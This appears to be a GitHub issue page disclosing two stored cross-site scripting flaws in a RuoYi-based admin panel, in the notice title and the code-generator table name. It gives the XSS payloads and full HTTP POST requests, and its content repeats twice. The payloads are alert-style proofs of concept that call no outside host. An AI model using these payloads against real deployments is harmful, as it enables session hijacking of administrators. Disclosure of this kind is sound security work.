You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
After the administrator logged in, open the following page
system management->Notice notice
Then add the following XSS statement to the announcement title
poc: ”><sCript>alertxss</SCript>
there is post package:
POST /system/notice/edit HTTP/1.1
Host: localhost
Content-Length: 219
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/system/notice/edit/10
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close
After the administrator logged in, open the following page
System tools->code generation
Then click Import, select any one and click OK. Then click Edit, click basic information, and enter the following XSS statement in the column of table name
poc2:')" onmousemove=alert(document.cookie) a=(1
there is post package:
POST /tool/gen/edit HTTP/1.1
Host: localhost
Content-Length: 3880
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/tool/gen/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close
After the administrator logged in, open the following page
system management->Notice notice
Then add the following XSS statement to the announcement title
poc:
”><sCript>alertxss</SCript>there is post package:
POST /system/notice/edit HTTP/1.1
Host: localhost
Content-Length: 219
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/system/notice/edit/10
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close
noticeId=10¬iceTitle=%E2%80%9D%3E%3CsCript%3Ealert%60xss%60%3C%2FSCript%3E¬iceType=1¬iceContent=%3Cp%3E%E2%80%9D%26gt%3B%26lt%3BsCript%26gt%3Balert%60xss%60%26lt%3B%2FSCript%26gt%3B%3Cbr%3E%3C%2Fp%3E&status=0&=
After the administrator logged in, open the following page
System tools->code generation
Then click Import, select any one and click OK. Then click Edit, click basic information, and enter the following XSS statement in the column of table name
poc2:
')" onmousemove=alert(document.cookie) a=(1there is post package:
POST /tool/gen/edit HTTP/1.1
Host: localhost
Content-Length: 3880
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/tool/gen/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close
tableId=1&tableName=')%22+onmousemove%3Dalert(document.cookie)+a%3D(1&tableComment=%E9%80%9A%E7%9F%A5%E5%85%AC%E5%91%8A%E8%A1%A8&className=SysNotice&functionAuthor=ruoyi&remark=&columns%5B0%5D.columnId=1&columns%5B0%5D.sort=1&columns%5B0%5D.columnComment=%E5%85%AC%E5%91%8AID&columns%5B0%5D.javaType=Integer&columns%5B0%5D.javaField=noticeId&columns%5B0%5D.isInsert=1&columns%5B0%5D.queryType=EQ&columns%5B0%5D.htmlType=input&columns%5B0%5D.dictType=&columns%5B1%5D.columnId=2&columns%5B1%5D.sort=2&columns%5B1%5D.columnComment=%E5%85%AC%E5%91%8A%E6%A0%87%E9%A2%98&columns%5B1%5D.javaType=String&columns%5B1%5D.javaField=noticeTitle&columns%5B1%5D.isInsert=1&columns%5B1%5D.isEdit=1&columns%5B1%5D.isList=1&columns%5B1%5D.isQuery=1&columns%5B1%5D.queryType=EQ&columns%5B1%5D.isRequired=1&columns%5B1%5D.htmlType=input&columns%5B1%5D.dictType=&columns%5B2%5D.columnId=3&columns%5B2%5D.sort=3&columns%5B2%5D.columnComment=%E5%85%AC%E5%91%8A%E7%B1%BB%E5%9E%8B%EF%BC%881%E9%80%9A%E7%9F%A5+2%E5%85%AC%E5%91%8A%EF%BC%89&columns%5B2%5D.javaType=String&columns%5B2%5D.javaField=noticeType&columns%5B2%5D.isInsert=1&columns%5B2%5D.isEdit=1&columns%5B2%5D.isList=1&columns%5B2%5D.isQuery=1&columns%5B2%5D.queryType=EQ&columns%5B2%5D.isRequired=1&columns%5B2%5D.htmlType=select&columns%5B2%5D.dictType=&columns%5B3%5D.columnId=4&columns%5B3%5D.sort=4&columns%5B3%5D.columnComment=%E5%85%AC%E5%91%8A%E5%86%85%E5%AE%B9&columns%5B3%5D.javaType=String&columns%5B3%5D.javaField=noticeContent&columns%5B3%5D.isInsert=1&columns%5B3%5D.isEdit=1&columns%5B3%5D.isList=1&columns%5B3%5D.isQuery=1&columns%5B3%5D.queryType=EQ&columns%5B3%5D.htmlType=summernote&columns%5B3%5D.dictType=&columns%5B4%5D.columnId=5&columns%5B4%5D.sort=5&columns%5B4%5D.columnComment=%E5%85%AC%E5%91%8A%E7%8A%B6%E6%80%81%EF%BC%880%E6%AD%A3%E5%B8%B8+1%E5%85%B3%E9%97%AD%EF%BC%89&columns%5B4%5D.javaType=String&columns%5B4%5D.javaField=status&columns%5B4%5D.isInsert=1&columns%5B4%5D.isEdit=1&columns%5B4%5D.isList=1&columns%5B4%5D.isQuery=1&columns%5B4%5D.queryType=EQ&columns%5B4%5D.htmlType=radio&columns%5B4%5D.dictType=&columns%5B5%5D.columnId=6&columns%5B5%5D.sort=6&columns%5B5%5D.columnComment=%E5%88%9B%E5%BB%BA%E8%80%85&columns%5B5%5D.javaType=String&columns%5B5%5D.javaField=createBy&columns%5B5%5D.isInsert=1&columns%5B5%5D.queryType=EQ&columns%5B5%5D.htmlType=input&columns%5B5%5D.dictType=&columns%5B6%5D.columnId=7&columns%5B6%5D.sort=7&columns%5B6%5D.columnComment=%E5%88%9B%E5%BB%BA%E6%97%B6%E9%97%B4&columns%5B6%5D.javaType=Date&columns%5B6%5D.javaField=createTime&columns%5B6%5D.isInsert=1&columns%5B6%5D.queryType=EQ&columns%5B6%5D.htmlType=datetime&columns%5B6%5D.dictType=&columns%5B7%5D.columnId=8&columns%5B7%5D.sort=8&columns%5B7%5D.columnComment=%E6%9B%B4%E6%96%B0%E8%80%85&columns%5B7%5D.javaType=String&columns%5B7%5D.javaField=updateBy&columns%5B7%5D.isInsert=1&columns%5B7%5D.isEdit=1&columns%5B7%5D.queryType=EQ&columns%5B7%5D.htmlType=input&columns%5B7%5D.dictType=&columns%5B8%5D.columnId=9&columns%5B8%5D.sort=9&columns%5B8%5D.columnComment=%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4&columns%5B8%5D.javaType=Date&columns%5B8%5D.javaField=updateTime&columns%5B8%5D.isInsert=1&columns%5B8%5D.isEdit=1&columns%5B8%5D.queryType=EQ&columns%5B8%5D.htmlType=datetime&columns%5B8%5D.dictType=&columns%5B9%5D.columnId=10&columns%5B9%5D.sort=10&columns%5B9%5D.columnComment=%E5%A4%87%E6%B3%A8&columns%5B9%5D.javaType=String&columns%5B9%5D.javaField=remark&columns%5B9%5D.isInsert=1&columns%5B9%5D.isEdit=1&columns%5B9%5D.isList=1&columns%5B9%5D.queryType=EQ&columns%5B9%5D.htmlType=input&columns%5B9%5D.dictType=&tplCategory=crud&packageName=com.ruoyi.system&moduleName=system&businessName=notice&functionName=%E9%80%9A%E7%9F%A5%E5%85%AC%E5%91%8A¶ms%5BparentMenuId%5D=¶ms%5BparentMenuName%5D=&genType=0&genPath=%2F&subTableName=¶ms%5BtreeCode%5D=¶ms%5BtreeParentCode%5D=¶ms%5BtreeName%5D=
The text was updated successfully, but these errors were encountered: